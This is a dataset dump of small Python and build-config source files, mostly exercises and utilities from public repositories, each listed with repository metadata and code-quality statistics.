hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
967f1bd43c77328bcdadd29ca902289cad671ab3 | 748 | py | Python | crackingcointsolutions/chapter1/excersisetwo.py | igoroya/igor-oya-solutions-cracking-coding-interview | 12173d327662d5a684929a2ef44e96658f156425 | [
"MIT"
] | null | null | null | crackingcointsolutions/chapter1/excersisetwo.py | igoroya/igor-oya-solutions-cracking-coding-interview | 12173d327662d5a684929a2ef44e96658f156425 | [
"MIT"
] | null | null | null | crackingcointsolutions/chapter1/excersisetwo.py | igoroya/igor-oya-solutions-cracking-coding-interview | 12173d327662d5a684929a2ef44e96658f156425 | [
"MIT"
] | null | null | null | '''
Created on Aug 8, 2017
Check permutation: Given two strings, write a method to decide if one is a permutation of the other
Things to learn:
- a python set orders set content
- in a set, one uses == to compare same content
@author: igoroya
'''
def check_string_permuntation(str1, str2):
    if len(str1) != len(str2):  # compare values with !=; 'is not' tests object identity
        return False
    strset1 = {i for i in str1}
    strset2 = {i for i in str2}
    # note: sets discard repeated characters, so only distinct characters are compared
    return strset1 == strset2
if __name__ == '__main__':
    str1 = 'aeiou'
    str2 = 'aeiuo'
    str3 = 'pepe'
    str4 = 'aeiouaeiou'
    print(check_string_permuntation(str1, str2))
    print(check_string_permuntation(str1, str3))
    print(check_string_permuntation(str1, str4))
| 23.375 | 99 | 0.667112 | 107 | 748 | 4.514019 | 0.53271 | 0.091097 | 0.190476 | 0.223602 | 0.271222 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044092 | 0.241979 | 748 | 31 | 100 | 24.129032 | 0.80776 | 0.319519 | 0 | 0.117647 | 0 | 0 | 0.064 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0 | 0 | 0.235294 | 0.176471 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
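The set comparison in the row above ignores character multiplicity, so two equal-length strings built from the same distinct characters (e.g. 'aabb' and 'abbb') would wrongly pass. A multiset comparison is the usual fix; a minimal sketch (the function name here is illustrative, not from the file above):

```python
from collections import Counter

def is_permutation(str1, str2):
    # Counter compares per-character counts, not just the set of characters
    if len(str1) != len(str2):
        return False
    return Counter(str1) == Counter(str2)

print(is_permutation('aeiou', 'aeiuo'))  # True
print(is_permutation('aabb', 'abbb'))    # False: same characters, different counts
```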
96923fd582147493f79df39ee859ca53fe9a69e5 | 2,202 | py | Python | SIPSim/Commands/OTU_table.py | arischwartz/test | 87a8306a294f59b0eef992529ce900cea876c605 | [
"MIT"
] | 2 | 2019-03-15T09:46:48.000Z | 2019-06-05T18:16:39.000Z | SIPSim/Commands/OTU_table.py | arischwartz/test | 87a8306a294f59b0eef992529ce900cea876c605 | [
"MIT"
] | 1 | 2020-11-01T23:18:10.000Z | 2020-11-01T23:18:10.000Z | SIPSim/Commands/OTU_table.py | arischwartz/test | 87a8306a294f59b0eef992529ce900cea876c605 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""
OTU_table: simulate OTUs for gradient fractions
Usage:
  OTU_table [options] <BD_KDE> <communities> <fractions>
  OTU_table -h | --help
  OTU_table --version
Options:
  <BD_KDE>       KDE object of BD value distributions.
                 ('-' if from STDIN)
  <communities>  Simulated community abundance table file.
  <fractions>    Simulated gradient fraction file.
  --abs=<aa>     Absolute abundance of all taxa in the community.
                 [default: 1e5]
  --np=<np>      Number of parallel processes.
                 [default: 1]
  --max=<m>      Max Number of BD values to bin at once.
                 Use smaller values to prevent memory errors.
                 [default: 10000000]
  --quiet        Limit STDERR output.
  --version      Show version.
  --debug        Debug mode.
  -h --help      Show this screen.
Description:
Create an OTU table of simulated OTUs for each fraction in >=1 CsCl gradient.
Basically, the location within the gradient (i.e., buoyant density)
of each DNA fragment associated with each taxon is determined, and
then binned into simulated gradient fractions that span certain
buoyant density ranges.
The abundance of each OTU in each fraction is based on:
1) The absolute abundance of the OTU in the pre-gradient community.
2) The G+C content of each simulated fragment of the taxon.
3) The fragment length of each simulated fragment (influences diffusion).
Output
------
A tab-delimited OTU table written to STDOUT.
Table column descriptions:
library : library_ID (gradient_ID)
fraction : fraction_ID
BD_XXX : buoyant density values
count : total number of DNA fragments for the taxon in the gradient fraction
rel_abund : relative abundance (0-1) for the taxon in the gradient fraction
"""
# import
## batteries
from docopt import docopt
import os, sys
## application libraries
from SIPSim import OTU_Table
def opt_parse(args=None):
    if args is None:
        args = docopt(__doc__, version='0.1')
    else:
        args = docopt(__doc__, version='0.1', argv=args)
    OTU_Table.main(args)
| 31.457143 | 80 | 0.658038 | 292 | 2,202 | 4.886986 | 0.472603 | 0.044849 | 0.016819 | 0.032235 | 0.075683 | 0.075683 | 0.044849 | 0 | 0 | 0 | 0 | 0.013068 | 0.270209 | 2,202 | 69 | 81 | 31.913043 | 0.874922 | 0.863306 | 0 | 0 | 0 | 0 | 0.020833 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.333333 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
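The file above parses its module docstring with docopt. For readers without docopt installed, a rough stdlib-only equivalent of the same positional/option interface can be sketched with argparse (defaults taken from the Options block; the argument list below is illustrative):

```python
import argparse

def parse_otu_table_args(argv):
    # Mirrors the docopt usage line: OTU_table [options] <BD_KDE> <communities> <fractions>
    parser = argparse.ArgumentParser(prog="OTU_table")
    parser.add_argument("BD_KDE")
    parser.add_argument("communities")
    parser.add_argument("fractions")
    parser.add_argument("--abs", default="1e5")
    parser.add_argument("--np", type=int, default=1)
    parser.add_argument("--max", type=int, default=10000000)
    parser.add_argument("--quiet", action="store_true")
    return parser.parse_args(argv)

args = parse_otu_table_args(["kde.pkl", "comm.txt", "fracs.txt", "--np", "4"])
print(args.np)           # 4
print(args.communities)  # comm.txt
```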
969e7c1ce4e9779511f9255cbe2a585370344d5d | 657 | py | Python | python/itypes/dataset/key.py | eddy-ilg/itypes | eaf1c4a86576c77caa34148c0fdc6b2e012119ff | [
"MIT"
] | null | null | null | python/itypes/dataset/key.py | eddy-ilg/itypes | eaf1c4a86576c77caa34148c0fdc6b2e012119ff | [
"MIT"
] | null | null | null | python/itypes/dataset/key.py | eddy-ilg/itypes | eaf1c4a86576c77caa34148c0fdc6b2e012119ff | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
class Key:
    def __init__(self, group_name=None, item_name=None, variable_name=None):
        self._group_name = group_name
        self._item_name = item_name
        self._variable_name = variable_name

    def group_name(self):
        return self._group_name

    def item_name(self):
        return self._item_name

    def variable_name(self):
        return self._variable_name

    def __str__(self):
        path = [self._group_name]
        if self._item_name is not None:
            path.append(self._item_name)
        if self._variable_name is not None:
path.append(self._variable_name) | 28.565217 | 76 | 0.637747 | 88 | 657 | 4.318182 | 0.238636 | 0.147368 | 0.136842 | 0.142105 | 0.142105 | 0.142105 | 0.142105 | 0 | 0 | 0 | 0 | 0.002123 | 0.283105 | 657 | 23 | 77 | 28.565217 | 0.804671 | 0.031963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.294118 | false | 0 | 0 | 0.176471 | 0.529412 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
96b025c2dd8d832b862903ff9c13f820e80e2899 | 172 | py | Python | Desafios/ex012/ex012.py | Jose-Wilson/Python | d7dc9f16b53708089c9e2659568220b7869bab99 | [
"MIT"
] | null | null | null | Desafios/ex012/ex012.py | Jose-Wilson/Python | d7dc9f16b53708089c9e2659568220b7869bab99 | [
"MIT"
] | null | null | null | Desafios/ex012/ex012.py | Jose-Wilson/Python | d7dc9f16b53708089c9e2659568220b7869bab99 | [
"MIT"
] | null | null | null | preço = float(input('Qual é o preço do produto? '))
novo = preço - (preço * 5 / 100)
print(f'O produto que custava R${preço}. \nNa promoção de 5% vai custar R${novo:.2f}')
| 43 | 86 | 0.656977 | 31 | 172 | 3.645161 | 0.709677 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042254 | 0.174419 | 172 | 3 | 87 | 57.333333 | 0.753521 | 0 | 0 | 0 | 0 | 0.333333 | 0.598837 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
96b373de3b9e2b724fcd05a2638ce75eaa2b54f0 | 153 | py | Python | tutorials/W1D5_DimensionalityReduction/solutions/W1D5_Tutorial4_Solution_7ac06f29.py | liuxiaomiao123/NeuroMathAcademy | 16a7969604a300bf9fbb86f8a5b26050ebd14c65 | [
"CC-BY-4.0"
] | 2 | 2020-07-03T04:39:09.000Z | 2020-07-12T02:08:31.000Z | tutorials/W1D5_DimensionalityReduction/solutions/W1D5_Tutorial4_Solution_7ac06f29.py | NinaHKivanani/course-content | 3c91dd1a669cebce892486ba4f8086b1ef2e1e49 | [
"CC-BY-4.0"
] | 1 | 2020-06-22T22:57:03.000Z | 2020-06-22T22:57:03.000Z | tutorials/W1D5_DimensionalityReduction/solutions/W1D5_Tutorial4_Solution_7ac06f29.py | NinaHKivanani/course-content | 3c91dd1a669cebce892486ba4f8086b1ef2e1e49 | [
"CC-BY-4.0"
] | 1 | 2021-08-06T08:05:01.000Z | 2021-08-06T08:05:01.000Z | X = X[:2000,:]
labels = labels[:2000]
score = pca_model.transform(X)
with plt.xkcd():
    visualize_components(score[:,0],score[:,1],labels)
plt.show() | 19.125 | 52 | 0.666667 | 23 | 153 | 4.347826 | 0.652174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 0.117647 | 153 | 8 | 53 | 19.125 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
96b3e28dec70d55b38acdf14f36dcdc59a10066d | 159 | py | Python | week_06/blur.py | DaviNakamuraCardoso/cs50 | 2081abb6fa1131184b07a68ed3b07d538c3ba3dd | [
"MIT"
] | 2 | 2020-08-05T23:27:24.000Z | 2020-08-12T01:52:29.000Z | week_06/blur.py | DaviNakamuraCardoso/cs50 | 2081abb6fa1131184b07a68ed3b07d538c3ba3dd | [
"MIT"
] | null | null | null | week_06/blur.py | DaviNakamuraCardoso/cs50 | 2081abb6fa1131184b07a68ed3b07d538c3ba3dd | [
"MIT"
] | 1 | 2020-08-07T04:50:09.000Z | 2020-08-07T04:50:09.000Z | from PIL import Image, ImageFilter
before = Image.open("/home/davi/Downloads/melado.jpg")
after = before.filter(ImageFilter.BLUR)
after.save("blurmelado.bmp") | 31.8 | 54 | 0.779874 | 22 | 159 | 5.636364 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075472 | 159 | 5 | 55 | 31.8 | 0.843537 | 0 | 0 | 0 | 0 | 0 | 0.28125 | 0.19375 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
96b9ec10cfe33325a91bf4f65d46bd67ee6cd676 | 540 | gyp | Python | src/shoco.gyp | lovell/shorter | e322f0837ceb074bf92656c0460299eabc10e0b1 | [
"Apache-2.0"
] | 30 | 2016-12-29T22:13:42.000Z | 2021-12-09T04:12:44.000Z | src/shoco.gyp | lovell/shorter | e322f0837ceb074bf92656c0460299eabc10e0b1 | [
"Apache-2.0"
] | 5 | 2017-07-10T15:50:20.000Z | 2021-08-23T10:59:53.000Z | src/shoco.gyp | lovell/shorter | e322f0837ceb074bf92656c0460299eabc10e0b1 | [
"Apache-2.0"
] | 6 | 2016-12-29T23:59:14.000Z | 2022-01-23T23:55:35.000Z | {
  'targets': [{
    'target_name': 'shoco',
    'type': 'static_library',
    'sources': ['shoco/shoco.c'],
    'cflags': [
      '-std=c99',
      '-fexceptions',
      '-Wall',
      '-march=native',
      '-Ofast'
    ],
    'xcode_settings': {
      'OTHER_CFLAGS': [
        '-std=c99',
        '-fexceptions',
        '-Wall',
        '-march=native',
        '-Ofast'
      ]
    },
    'msvs_settings': {
      'VCCLCompilerTool': {
        'ExceptionHandling': 1,
        'DisableSpecificWarnings': ['4244']
      }
    }
  }]
}
| 18 | 43 | 0.442593 | 37 | 540 | 6.324324 | 0.702703 | 0.076923 | 0.102564 | 0.196581 | 0.367521 | 0.367521 | 0.367521 | 0.367521 | 0 | 0 | 0 | 0.025714 | 0.351852 | 540 | 29 | 44 | 18.62069 | 0.642857 | 0 | 0 | 0.344828 | 0 | 0 | 0.47037 | 0.042593 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
96bb508294da6e43de194388233605a2b4dda3c7 | 520 | py | Python | BBC Microbits/Code/img_diagonal.py | TuxStory/Python3 | 4c1b2291d1613b32aa36b62b0b881ea40b423cce | [
"MIT"
] | null | null | null | BBC Microbits/Code/img_diagonal.py | TuxStory/Python3 | 4c1b2291d1613b32aa36b62b0b881ea40b423cce | [
"MIT"
] | null | null | null | BBC Microbits/Code/img_diagonal.py | TuxStory/Python3 | 4c1b2291d1613b32aa36b62b0b881ea40b423cce | [
"MIT"
] | null | null | null | from microbit import *
img = Image(5,5)
for j in range(10):
    for i in range(5):
        img.set_pixel(i,i,9)
        display.show(img)
        sleep(500)
        img.set_pixel(i,i,0)
        display.clear()
    for i in range(3):
        img.set_pixel(3-i,3-i,9)
        display.show(img)
        sleep(500)
        img.set_pixel(3-i,3-i,0)
        display.clear()
'''
test = [1,4,2,2,4,3,4,0,2,1,0,4,3]
for i in test():
    img.set_pixel((test[2]),(test[5]),9)
    display.show(img)
    sleep(100)
    display.clear()
''' | 20 | 40 | 0.540385 | 97 | 520 | 2.845361 | 0.278351 | 0.108696 | 0.199275 | 0.163043 | 0.442029 | 0.318841 | 0.318841 | 0.253623 | 0.253623 | 0.253623 | 0 | 0.102632 | 0.269231 | 520 | 26 | 41 | 20 | 0.623684 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.066667 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7366d76b4a41725d1db70467daffafb5d26a3f70 | 1,207 | py | Python | src/muses/settings.py | Aincient/cleo | 933ef372fa7847d943206d72bfb03c201dbafbd6 | [
"Apache-2.0"
] | null | null | null | src/muses/settings.py | Aincient/cleo | 933ef372fa7847d943206d72bfb03c201dbafbd6 | [
"Apache-2.0"
] | null | null | null | src/muses/settings.py | Aincient/cleo | 933ef372fa7847d943206d72bfb03c201dbafbd6 | [
"Apache-2.0"
] | 3 | 2018-10-01T12:04:36.000Z | 2021-01-07T09:30:50.000Z | from .conf import get_setting
__all__ = (
    'CONFIG',
    'DEBUG',
    'EXPORTER_PLUGIN_MODULE_NAME',
    'FAIL_ON_ERRORS_IN_EXPORTER_PLUGINS',
    'FAIL_ON_ERRORS_IN_IMPORTER_PLUGINS',
    'FAIL_ON_MISSING_EXPORTER_PLUGINS',
    'FAIL_ON_MISSING_IMPORTER_PLUGINS',
    'IMPORTER_PLUGIN_MODULE_NAME',
)
# **************************************************************
# **************************************************************
# *************************** Core *****************************
# **************************************************************
# **************************************************************
IMPORTER_PLUGIN_MODULE_NAME = get_setting('IMPORTER_PLUGIN_MODULE_NAME')
EXPORTER_PLUGIN_MODULE_NAME = get_setting('EXPORTER_PLUGIN_MODULE_NAME')
CONFIG = get_setting('CONFIG')
DEBUG = get_setting('DEBUG')
FAIL_ON_ERRORS_IN_IMPORTER_PLUGINS = get_setting(
    'FAIL_ON_ERRORS_IN_IMPORTER_PLUGINS'
)
FAIL_ON_MISSING_IMPORTER_PLUGINS = get_setting(
    'FAIL_ON_MISSING_IMPORTER_PLUGINS'
)
FAIL_ON_ERRORS_IN_EXPORTER_PLUGINS = get_setting(
    'FAIL_ON_ERRORS_IN_EXPORTER_PLUGINS'
)
FAIL_ON_MISSING_EXPORTER_PLUGINS = get_setting(
    'FAIL_ON_MISSING_EXPORTER_PLUGINS'
)
| 30.175 | 72 | 0.592378 | 119 | 1,207 | 5.294118 | 0.168067 | 0.114286 | 0.152381 | 0.133333 | 0.688889 | 0.55873 | 0.288889 | 0.234921 | 0.133333 | 0 | 0 | 0 | 0.095278 | 1,207 | 39 | 73 | 30.948718 | 0.576923 | 0.260149 | 0 | 0 | 0 | 0 | 0.444194 | 0.419391 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
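The settings module above routes every constant through muses.conf.get_setting, which is not shown in this dump. A common shape for such a helper, sketched purely as an assumption (the real one likely reads Django settings), is a namespaced lookup with per-key defaults:

```python
# Hypothetical sketch of a get_setting helper; the real muses.conf version is not shown here.
DEFAULTS = {
    "DEBUG": False,
    "CONFIG": {},
    "IMPORTER_PLUGIN_MODULE_NAME": "muses_importer_plugin",
}

def get_setting(name, overrides=None):
    # Prefer an explicit override (e.g. values from django.conf.settings), else the default.
    overrides = overrides or {}
    if name in overrides:
        return overrides[name]
    return DEFAULTS.get(name)

print(get_setting("DEBUG"))                   # False
print(get_setting("DEBUG", {"DEBUG": True}))  # True
```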
7376cda299e3b466a808b725b51c41fb8223052c | 958 | py | Python | api/views/enrolled_course.py | evan-rusin/fly-project | 8afc697f2a9fb63317cca2763ed0ed76f9ef2ead | [
"BSD-2-Clause"
] | 15 | 2016-11-17T08:34:52.000Z | 2021-11-12T07:08:58.000Z | api/views/enrolled_course.py | evan-rusin/fly-project | 8afc697f2a9fb63317cca2763ed0ed76f9ef2ead | [
"BSD-2-Clause"
] | 137 | 2015-12-07T19:48:03.000Z | 2016-10-11T20:19:33.000Z | api/views/enrolled_course.py | evan-rusin/fly-project | 8afc697f2a9fb63317cca2763ed0ed76f9ef2ead | [
"BSD-2-Clause"
] | 11 | 2016-10-21T22:43:54.000Z | 2021-08-28T14:41:02.000Z | import django_filters
from django.contrib.auth.models import User, Group
from rest_framework import viewsets, mixins
from rest_framework.response import Response
from rest_framework.authentication import TokenAuthentication
from rest_framework import filters
from api.pagination import LargeResultsSetPagination
from api.permissions import IsUser
from api.serializers import EnrolledCourseSerializer
from api.models import EnrolledCourse
class EnrolledCourseFilter(django_filters.FilterSet):
    class Meta:
        model = EnrolledCourse
        fields = ['id', 'created', 'user', 'course', 'finished', 'is_finished', 'final_mark',]


class EnrolledCourseViewSet(viewsets.ModelViewSet):
    queryset = EnrolledCourse.objects.all()
    serializer_class = EnrolledCourseSerializer
    pagination_class = LargeResultsSetPagination
    authentication_classes = (TokenAuthentication,)
    permission_classes = (IsUser,)
    filter_class = EnrolledCourseFilter
| 36.846154 | 94 | 0.806889 | 96 | 958 | 7.916667 | 0.479167 | 0.042105 | 0.089474 | 0.060526 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129436 | 958 | 25 | 95 | 38.32 | 0.911271 | 0 | 0 | 0 | 0 | 0 | 0.050104 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.47619 | 0 | 0.904762 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
7383de42b52503daffb8a04786191272cb7e5661 | 1,930 | py | Python | dl_multi/metrics/scores.py | wbrandenburger/MTPIA | 02c773ce60b7efd5b15f270f047a6da5a8f00b7e | [
"MIT"
] | 1 | 2020-04-14T10:19:37.000Z | 2020-04-14T10:19:37.000Z | dl_multi/metrics/scores.py | wbrandenburger/MTPIA | 02c773ce60b7efd5b15f270f047a6da5a8f00b7e | [
"MIT"
] | null | null | null | dl_multi/metrics/scores.py | wbrandenburger/MTPIA | 02c773ce60b7efd5b15f270f047a6da5a8f00b7e | [
"MIT"
] | null | null | null | # ===========================================================================
# scores.py ---------------------------------------------------------------
# ===========================================================================
# class -------------------------------------------------------------------
# ---------------------------------------------------------------------------
class Scores():

    # method --------------------------------------------------------------
    # -----------------------------------------------------------------------
    def __init__(
        self,
        number=1,
        logger=None
    ):
        self._len = number
        self._logger = logger

    # method --------------------------------------------------------------
    # -----------------------------------------------------------------------
    def __len__(self):
        return self._len

    # method --------------------------------------------------------------
    # -----------------------------------------------------------------------
    def __iter__(self):
        self._index = -1
        return self

    # method --------------------------------------------------------------
    # -----------------------------------------------------------------------
    def __next__(self):
        if self._index < self._len-1:
            self._index += 1
            return self
        else:
            raise StopIteration

    # method --------------------------------------------------------------
    # -----------------------------------------------------------------------
    def __repr__(self):
        pass

    # method --------------------------------------------------------------
    # -----------------------------------------------------------------------
    def logger(self, log_str):
        if self._logger is not None:
            self._logger.info(log_str)
return log_str | 38.6 | 77 | 0.187565 | 78 | 1,930 | 4.230769 | 0.346154 | 0.163636 | 0.060606 | 0.09697 | 0.121212 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002528 | 0.180311 | 1,930 | 50 | 78 | 38.6 | 0.206068 | 0.644041 | 0 | 0.08 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.24 | false | 0.04 | 0 | 0.04 | 0.44 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
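The Scores class in the row above implements the iterator protocol by yielding itself once per score slot. A self-contained copy (without the logger plumbing, reproduced here just to show the behavior) iterates len(scores) times:

```python
class Scores:
    def __init__(self, number=1):
        self._len = number

    def __len__(self):
        return self._len

    def __iter__(self):
        # Reset the cursor so each for-loop starts from the first slot.
        self._index = -1
        return self

    def __next__(self):
        if self._index < self._len - 1:
            self._index += 1
            return self  # the object itself is yielded, as in the class above
        raise StopIteration

scores = Scores(number=3)
print(len(scores))             # 3
print(sum(1 for _ in scores))  # 3: one iteration per slot
```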
